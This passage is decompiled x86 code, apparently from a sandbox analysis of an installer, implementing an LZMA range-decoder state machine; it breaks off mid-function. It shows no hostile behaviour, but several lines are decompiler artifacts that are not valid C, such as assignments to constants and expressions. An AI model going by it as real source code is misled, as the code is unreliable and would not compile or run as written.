                    				void* _t535;
                    				signed int _t536;
                    				signed int _t565;
                    				signed int _t568;
                    				signed int _t589;
                    				signed int* _t606;
                    				void* _t613;
                    
                    				L0:
                    				while(1) {
                    					L0:
                    					if( *(_t613 - 0x40) != 0) {
                    						L89:
                    						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                    						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                    						L69:
                    						_t606 =  *(_t613 - 0x58);
                    						 *(_t613 - 0x84) = 0x12;
                    						L132:
                    						 *(_t613 - 0x54) = _t606;
                    						L133:
                    						_t532 =  *_t606;
                    						_t589 = _t532 & 0x0000ffff;
                    						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                    						if( *(_t613 - 0xc) >= _t565) {
                    							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                    							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                    							 *(_t613 - 0x40) = 1;
                    							_t533 = _t532 - (_t532 >> 5);
                    							 *_t606 = _t533;
                    						} else {
                    							 *(_t613 - 0x10) = _t565;
                    							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                    							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                    						}
                    						if( *(_t613 - 0x10) >= 0x1000000) {
                    							L139:
                    							_t534 =  *(_t613 - 0x84);
                    							L140:
                    							 *(_t613 - 0x88) = _t534;
                    							goto L1;
                    						} else {
                    							L137:
                    							if( *(_t613 - 0x6c) == 0) {
                    								 *(_t613 - 0x88) = 5;
                    								goto L170;
                    							}
                    							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                    							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                    							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                    							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                    							goto L139;
                    						}
                    					} else {
                    						if( *(__ebp - 0x60) == 0) {
                    							L171:
                    							_t536 = _t535 | 0xffffffff;
                    							L172:
                    							return _t536;
                    						}
                    						__eax = 0;
                    						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                    						0 | _t258 = _t258 + _t258 + 9;
                    						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                    						L75:
                    						if( *(__ebp - 0x64) == 0) {
                    							 *(__ebp - 0x88) = 0x1b;
                    							L170:
                    							_t568 = 0x22;
                    							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                    							_t536 = 0;
                    							goto L172;
                    						}
                    						__eax =  *(__ebp - 0x14);
                    						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    						if(__eax >=  *(__ebp - 0x74)) {
                    							__eax = __eax +  *(__ebp - 0x74);
                    						}
                    						__edx =  *(__ebp - 8);
                    						__cl =  *(__eax + __edx);
                    						__eax =  *(__ebp - 0x14);
                    						 *(__ebp - 0x5c) = __cl;
                    						 *(__eax + __edx) = __cl;
                    						__eax = __eax + 1;
                    						__edx = 0;
                    						_t274 = __eax %  *(__ebp - 0x74);
                    						__eax = __eax /  *(__ebp - 0x74);
                    						__edx = _t274;
                    						__eax =  *(__ebp - 0x68);
                    						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    						_t283 = __ebp - 0x64;
                    						 *_t283 =  *(__ebp - 0x64) - 1;
                    						 *( *(__ebp - 0x68)) = __cl;
                    						L79:
                    						 *(__ebp - 0x14) = __edx;
                    						L80:
                    						 *(__ebp - 0x88) = 2;
                    					}
                    					L1:
                    					_t535 =  *(_t613 - 0x88);
                    					if(_t535 > 0x1c) {
                    						goto L171;
                    					}
                    					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
                    						case 0:
                    							if( *(_t613 - 0x6c) == 0) {
                    								goto L170;
                    							}
                    							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                    							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                    							_t535 =  *( *(_t613 - 0x70));
                    							if(_t535 > 0xe1) {
                    								goto L171;
                    							}
                    							_t539 = _t535 & 0x000000ff;
                    							_push(0x2d);
                    							asm("cdq");
                    							_pop(_t570);
                    							_push(9);
                    							_pop(_t571);
                    							_t609 = _t539 / _t570;
                    							_t541 = _t539 % _t570 & 0x000000ff;
                    							asm("cdq");
                    							_t604 = _t541 % _t571 & 0x000000ff;
                    							 *(_t613 - 0x3c) = _t604;
                    							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                    							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                    							_t612 = (0x300 << _t604 + _t609) + 0x736;
                    							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                    								L10:
                    								if(_t612 == 0) {
                    									L12:
                    									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                    									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                    									goto L15;
                    								} else {
                    									goto L11;
                    								}
                    								do {
                    									L11:
                    									_t612 = _t612 - 1;
                    									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                    								} while (_t612 != 0);
                    								goto L12;
                    							}
                    							if( *(_t613 - 4) != 0) {
                    								GlobalFree( *(_t613 - 4));
                    							}
                    							_t535 = GlobalAlloc(0x40, 0x600); // executed
                    							 *(_t613 - 4) = _t535;
                    							if(_t535 == 0) {
                    								goto L171;
                    							} else {
                    								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                    								goto L10;
                    							}
                    						case 1:
                    							L13:
                    							__eflags =  *(_t613 - 0x6c);
                    							if( *(_t613 - 0x6c) == 0) {
                    								 *(_t613 - 0x88) = 1;
                    								goto L170;
                    							}
                    							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                    							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                    							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                    							_t45 = _t613 - 0x48;
                    							 *_t45 =  *(_t613 - 0x48) + 1;
                    							__eflags =  *_t45;
                    							L15:
                    							if( *(_t613 - 0x48) < 4) {
                    								goto L13;
                    							}
                    							_t547 =  *(_t613 - 0x40);
                    							if(_t547 ==  *(_t613 - 0x74)) {
                    								L20:
                    								 *(_t613 - 0x48) = 5;
                    								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                    								goto L23;
                    							}
                    							 *(_t613 - 0x74) = _t547;
                    							if( *(_t613 - 8) != 0) {
                    								GlobalFree( *(_t613 - 8));
                    							}
                    							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                    							 *(_t613 - 8) = _t535;
                    							if(_t535 == 0) {
                    								goto L171;
                    							} else {
                    								goto L20;
                    							}
                    						case 2:
                    							L24:
                    							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                    							 *(_t613 - 0x84) = 6;
                    							 *(_t613 - 0x4c) = _t554;
                    							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                    							goto L132;
                    						case 3:
                    							L21:
                    							__eflags =  *(_t613 - 0x6c);
                    							if( *(_t613 - 0x6c) == 0) {
                    								 *(_t613 - 0x88) = 3;
                    								goto L170;
                    							}
                    							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                    							_t67 = _t613 - 0x70;
                    							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                    							__eflags =  *_t67;
                    							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                    							L23:
                    							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                    							if( *(_t613 - 0x48) != 0) {
                    								goto L21;
                    							}
                    							goto L24;
                    						case 4:
                    							goto L133;
                    						case 5:
                    							goto L137;
                    						case 6:
                    							__edx = 0;
                    							__eflags =  *(__ebp - 0x40);
                    							if( *(__ebp - 0x40) != 0) {
                    								__eax =  *(__ebp - 4);
                    								__ecx =  *(__ebp - 0x38);
                    								 *(__ebp - 0x34) = 1;
                    								 *(__ebp - 0x84) = 7;
                    								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                    								goto L132;
                    							}
                    							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                    							__esi =  *(__ebp - 0x60);
                    							__cl = 8;
                    							__cl = 8 -  *(__ebp - 0x3c);
                    							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                    							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                    							__ecx =  *(__ebp - 0x3c);
                    							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                    							__ecx =  *(__ebp - 4);
                    							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                    							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                    							__eflags =  *(__ebp - 0x38) - 4;
                    							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    							if( *(__ebp - 0x38) >= 4) {
                    								__eflags =  *(__ebp - 0x38) - 0xa;
                    								if( *(__ebp - 0x38) >= 0xa) {
                    									_t98 = __ebp - 0x38;
                    									 *_t98 =  *(__ebp - 0x38) - 6;
                    									__eflags =  *_t98;
                    								} else {
                    									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                    								}
                    							} else {
                    								 *(__ebp - 0x38) = 0;
                    							}
                    							__eflags =  *(__ebp - 0x34) - __edx;
                    							if( *(__ebp - 0x34) == __edx) {
                    								__ebx = 0;
                    								__ebx = 1;
                    								goto L61;
                    							} else {
                    								__eax =  *(__ebp - 0x14);
                    								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    								__eflags = __eax -  *(__ebp - 0x74);
                    								if(__eax >=  *(__ebp - 0x74)) {
                    									__eax = __eax +  *(__ebp - 0x74);
                    									__eflags = __eax;
                    								}
                    								__ecx =  *(__ebp - 8);
                    								__ebx = 0;
                    								__ebx = 1;
                    								__al =  *((intOrPtr*)(__eax + __ecx));
                    								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                    								goto L41;
                    							}
                    						case 7:
                    							__eflags =  *(__ebp - 0x40) - 1;
                    							if( *(__ebp - 0x40) != 1) {
                    								__eax =  *(__ebp - 0x24);
                    								 *(__ebp - 0x80) = 0x16;
                    								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    								__eax =  *(__ebp - 0x28);
                    								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    								__eax =  *(__ebp - 0x2c);
                    								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    								__eax = 0;
                    								__eflags =  *(__ebp - 0x38) - 7;
                    								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    								__al = __al & 0x000000fd;
                    								__eax = (__eflags >= 0) - 1 + 0xa;
                    								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                    								__eax =  *(__ebp - 4);
                    								__eax =  *(__ebp - 4) + 0x664;
                    								__eflags = __eax;
                    								 *(__ebp - 0x58) = __eax;
                    								goto L69;
                    							}
                    							__eax =  *(__ebp - 4);
                    							__ecx =  *(__ebp - 0x38);
                    							 *(__ebp - 0x84) = 8;
                    							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                    							goto L132;
                    						case 8:
                    							__eflags =  *(__ebp - 0x40);
                    							if( *(__ebp - 0x40) != 0) {
                    								__eax =  *(__ebp - 4);
                    								__ecx =  *(__ebp - 0x38);
                    								 *(__ebp - 0x84) = 0xa;
                    								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                    							} else {
                    								__eax =  *(__ebp - 0x38);
                    								__ecx =  *(__ebp - 4);
                    								__eax =  *(__ebp - 0x38) + 0xf;
                    								 *(__ebp - 0x84) = 9;
                    								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                    								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                    							}
                    							goto L132;
                    						case 9:
                    							goto L0;
                    						case 0xa:
                    							__eflags =  *(__ebp - 0x40);
                    							if( *(__ebp - 0x40) != 0) {
                    								__eax =  *(__ebp - 4);
                    								__ecx =  *(__ebp - 0x38);
                    								 *(__ebp - 0x84) = 0xb;
                    								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                    								goto L132;
                    							}
                    							__eax =  *(__ebp - 0x28);
                    							goto L88;
                    						case 0xb:
                    							__eflags =  *(__ebp - 0x40);
                    							if( *(__ebp - 0x40) != 0) {
                    								__ecx =  *(__ebp - 0x24);
                    								__eax =  *(__ebp - 0x20);
                    								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    							} else {
                    								__eax =  *(__ebp - 0x24);
                    							}
                    							__ecx =  *(__ebp - 0x28);
                    							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    							L88:
                    							__ecx =  *(__ebp - 0x2c);
                    							 *(__ebp - 0x2c) = __eax;
                    							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    							goto L89;
                    						case 0xc:
                    							L99:
                    							__eflags =  *(__ebp - 0x6c);
                    							if( *(__ebp - 0x6c) == 0) {
                    								 *(__ebp - 0x88) = 0xc;
                    								goto L170;
                    							}
                    							__ecx =  *(__ebp - 0x70);
                    							__eax =  *(__ebp - 0xc);
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							_t334 = __ebp - 0x70;
                    							 *_t334 =  *(__ebp - 0x70) + 1;
                    							__eflags =  *_t334;
                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							__eax =  *(__ebp - 0x2c);
                    							goto L101;
                    						case 0xd:
                    							L37:
                    							__eflags =  *(__ebp - 0x6c);
                    							if( *(__ebp - 0x6c) == 0) {
                    								 *(__ebp - 0x88) = 0xd;
                    								goto L170;
                    							}
                    							__ecx =  *(__ebp - 0x70);
                    							__eax =  *(__ebp - 0xc);
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							_t122 = __ebp - 0x70;
                    							 *_t122 =  *(__ebp - 0x70) + 1;
                    							__eflags =  *_t122;
                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							L39:
                    							__eax =  *(__ebp - 0x40);
                    							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                    								goto L48;
                    							}
                    							__eflags = __ebx - 0x100;
                    							if(__ebx >= 0x100) {
                    								goto L54;
                    							}
                    							L41:
                    							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                    							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                    							__ecx =  *(__ebp - 0x58);
                    							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                    							 *(__ebp - 0x48) = __eax;
                    							__eax = __eax + 1;
                    							__eax = __eax << 8;
                    							__eax = __eax + __ebx;
                    							__esi =  *(__ebp - 0x58) + __eax * 2;
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    							__ax =  *__esi;
                    							 *(__ebp - 0x54) = __esi;
                    							__edx = __ax & 0x0000ffff;
                    							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                    							__eflags =  *(__ebp - 0xc) - __ecx;
                    							if( *(__ebp - 0xc) >= __ecx) {
                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    								__cx = __ax;
                    								 *(__ebp - 0x40) = 1;
                    								__cx = __ax >> 5;
                    								__eflags = __eax;
                    								__ebx = __ebx + __ebx + 1;
                    								 *__esi = __ax;
                    							} else {
                    								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                    								 *(__ebp - 0x10) = __ecx;
                    								0x800 = 0x800 - __edx;
                    								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                    								__ebx = __ebx + __ebx;
                    								 *__esi = __cx;
                    							}
                    							__eflags =  *(__ebp - 0x10) - 0x1000000;
                    							 *(__ebp - 0x44) = __ebx;
                    							if( *(__ebp - 0x10) >= 0x1000000) {
                    								goto L39;
                    							} else {
                    								goto L37;
                    							}
                    						case 0xe:
                    							L46:
                    							__eflags =  *(__ebp - 0x6c);
                    							if( *(__ebp - 0x6c) == 0) {
                    								 *(__ebp - 0x88) = 0xe;
                    								goto L170;
                    							}
                    							__ecx =  *(__ebp - 0x70);
                    							__eax =  *(__ebp - 0xc);
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							_t156 = __ebp - 0x70;
                    							 *_t156 =  *(__ebp - 0x70) + 1;
                    							__eflags =  *_t156;
                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							while(1) {
                    								L48:
                    								__eflags = __ebx - 0x100;
                    								if(__ebx >= 0x100) {
                    									break;
                    								}
                    								__eax =  *(__ebp - 0x58);
                    								__edx = __ebx + __ebx;
                    								__ecx =  *(__ebp - 0x10);
                    								__esi = __edx + __eax;
                    								__ecx =  *(__ebp - 0x10) >> 0xb;
                    								__ax =  *__esi;
                    								 *(__ebp - 0x54) = __esi;
                    								__edi = __ax & 0x0000ffff;
                    								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    								__eflags =  *(__ebp - 0xc) - __ecx;
                    								if( *(__ebp - 0xc) >= __ecx) {
                    									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    									__cx = __ax;
                    									_t170 = __edx + 1; // 0x1
                    									__ebx = _t170;
                    									__cx = __ax >> 5;
                    									__eflags = __eax;
                    									 *__esi = __ax;
                    								} else {
                    									 *(__ebp - 0x10) = __ecx;
                    									0x800 = 0x800 - __edi;
                    									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    									__ebx = __ebx + __ebx;
                    									 *__esi = __cx;
                    								}
                    								__eflags =  *(__ebp - 0x10) - 0x1000000;
                    								 *(__ebp - 0x44) = __ebx;
                    								if( *(__ebp - 0x10) >= 0x1000000) {
                    									continue;
                    								} else {
                    									goto L46;
                    								}
                    							}
                    							L54:
                    							_t173 = __ebp - 0x34;
                    							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                    							__eflags =  *_t173;
                    							goto L55;
                    						case 0xf:
                    							L58:
                    							__eflags =  *(__ebp - 0x6c);
                    							if( *(__ebp - 0x6c) == 0) {
                    								 *(__ebp - 0x88) = 0xf;
                    								goto L170;
                    							}
                    							__ecx =  *(__ebp - 0x70);
                    							__eax =  *(__ebp - 0xc);
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							_t203 = __ebp - 0x70;
                    							 *_t203 =  *(__ebp - 0x70) + 1;
                    							__eflags =  *_t203;
                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							L60:
                    							__eflags = __ebx - 0x100;
                    							if(__ebx >= 0x100) {
                    								L55:
                    								__al =  *(__ebp - 0x44);
                    								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                    								goto L56;
                    							}
                    							L61:
                    							__eax =  *(__ebp - 0x58);
                    							__edx = __ebx + __ebx;
                    							__ecx =  *(__ebp - 0x10);
                    							__esi = __edx + __eax;
                    							__ecx =  *(__ebp - 0x10) >> 0xb;
                    							__ax =  *__esi;
                    							 *(__ebp - 0x54) = __esi;
                    							__edi = __ax & 0x0000ffff;
                    							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    							__eflags =  *(__ebp - 0xc) - __ecx;
                    							if( *(__ebp - 0xc) >= __ecx) {
                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    								__cx = __ax;
                    								_t217 = __edx + 1; // 0x1
                    								__ebx = _t217;
                    								__cx = __ax >> 5;
                    								__eflags = __eax;
                    								 *__esi = __ax;
                    							} else {
                    								 *(__ebp - 0x10) = __ecx;
                    								0x800 = 0x800 - __edi;
                    								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    								__ebx = __ebx + __ebx;
                    								 *__esi = __cx;
                    							}
                    							__eflags =  *(__ebp - 0x10) - 0x1000000;
                    							 *(__ebp - 0x44) = __ebx;
                    							if( *(__ebp - 0x10) >= 0x1000000) {
                    								goto L60;
                    							} else {
                    								goto L58;
                    							}
                    						case 0x10:
                    							L109:
                    							__eflags =  *(__ebp - 0x6c);
                    							if( *(__ebp - 0x6c) == 0) {
                    								 *(__ebp - 0x88) = 0x10;
                    								goto L170;
                    							}
                    							__ecx =  *(__ebp - 0x70);
                    							__eax =  *(__ebp - 0xc);
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							_t365 = __ebp - 0x70;
                    							 *_t365 =  *(__ebp - 0x70) + 1;
                    							__eflags =  *_t365;
                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							goto L111;
                    						case 0x11:
                    							goto L69;
                    						case 0x12:
                    							__eflags =  *(__ebp - 0x40);
                    							if( *(__ebp - 0x40) != 0) {
                    								__eax =  *(__ebp - 0x58);
                    								 *(__ebp - 0x84) = 0x13;
                    								__esi =  *(__ebp - 0x58) + 2;
                    								goto L132;
                    							}
                    							__eax =  *(__ebp - 0x4c);
                    							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                    							__ecx =  *(__ebp - 0x58);
                    							__eax =  *(__ebp - 0x4c) << 4;
                    							__eflags = __eax;
                    							__eax =  *(__ebp - 0x58) + __eax + 4;
                    							goto L130;
                    						case 0x13:
                    							__eflags =  *(__ebp - 0x40);
                    							if( *(__ebp - 0x40) != 0) {
                    								_t469 = __ebp - 0x58;
                    								 *_t469 =  *(__ebp - 0x58) + 0x204;
                    								__eflags =  *_t469;
                    								 *(__ebp - 0x30) = 0x10;
                    								 *(__ebp - 0x40) = 8;
                    								L144:
                    								 *(__ebp - 0x7c) = 0x14;
                    								goto L145;
                    							}
                    							__eax =  *(__ebp - 0x4c);
                    							__ecx =  *(__ebp - 0x58);
                    							__eax =  *(__ebp - 0x4c) << 4;
                    							 *(__ebp - 0x30) = 8;
                    							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                    							L130:
                    							 *(__ebp - 0x58) = __eax;
                    							 *(__ebp - 0x40) = 3;
                    							goto L144;
                    						case 0x14:
                    							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                    							__eax =  *(__ebp - 0x80);
                    							goto L140;
                    						case 0x15:
                    							__eax = 0;
                    							__eflags =  *(__ebp - 0x38) - 7;
                    							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    							__al = __al & 0x000000fd;
                    							__eax = (__eflags >= 0) - 1 + 0xb;
                    							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                    							goto L120;
                    						case 0x16:
                    							__eax =  *(__ebp - 0x30);
                    							__eflags = __eax - 4;
                    							if(__eax >= 4) {
                    								_push(3);
                    								_pop(__eax);
                    							}
                    							__ecx =  *(__ebp - 4);
                    							 *(__ebp - 0x40) = 6;
                    							__eax = __eax << 7;
                    							 *(__ebp - 0x7c) = 0x19;
                    							 *(__ebp - 0x58) = __eax;
                    							goto L145;
                    						case 0x17:
                    							L145:
                    							__eax =  *(__ebp - 0x40);
                    							 *(__ebp - 0x50) = 1;
                    							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                    							goto L149;
                    						case 0x18:
                    							L146:
                    							__eflags =  *(__ebp - 0x6c);
                    							if( *(__ebp - 0x6c) == 0) {
                    								 *(__ebp - 0x88) = 0x18;
                    								goto L170;
                    							}
                    							__ecx =  *(__ebp - 0x70);
                    							__eax =  *(__ebp - 0xc);
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							_t484 = __ebp - 0x70;
                    							 *_t484 =  *(__ebp - 0x70) + 1;
                    							__eflags =  *_t484;
                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							L148:
                    							_t487 = __ebp - 0x48;
                    							 *_t487 =  *(__ebp - 0x48) - 1;
                    							__eflags =  *_t487;
                    							L149:
                    							__eflags =  *(__ebp - 0x48);
                    							if( *(__ebp - 0x48) <= 0) {
                    								__ecx =  *(__ebp - 0x40);
                    								__ebx =  *(__ebp - 0x50);
                    								0 = 1;
                    								__eax = 1 << __cl;
                    								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                    								__eax =  *(__ebp - 0x7c);
                    								 *(__ebp - 0x44) = __ebx;
                    								goto L140;
                    							}
                    							__eax =  *(__ebp - 0x50);
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    							__eax =  *(__ebp - 0x58);
                    							__esi = __edx + __eax;
                    							 *(__ebp - 0x54) = __esi;
                    							__ax =  *__esi;
                    							__edi = __ax & 0x0000ffff;
                    							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    							__eflags =  *(__ebp - 0xc) - __ecx;
                    							if( *(__ebp - 0xc) >= __ecx) {
                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    								__cx = __ax;
                    								__cx = __ax >> 5;
                    								__eax = __eax - __ecx;
                    								__edx = __edx + 1;
                    								__eflags = __edx;
                    								 *__esi = __ax;
                    								 *(__ebp - 0x50) = __edx;
                    							} else {
                    								 *(__ebp - 0x10) = __ecx;
                    								0x800 = 0x800 - __edi;
                    								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    								 *__esi = __cx;
                    							}
                    							__eflags =  *(__ebp - 0x10) - 0x1000000;
                    							if( *(__ebp - 0x10) >= 0x1000000) {
                    								goto L148;
                    							} else {
                    								goto L146;
                    							}
                    						case 0x19:
                    							__eflags = __ebx - 4;
                    							if(__ebx < 4) {
                    								 *(__ebp - 0x2c) = __ebx;
                    								L119:
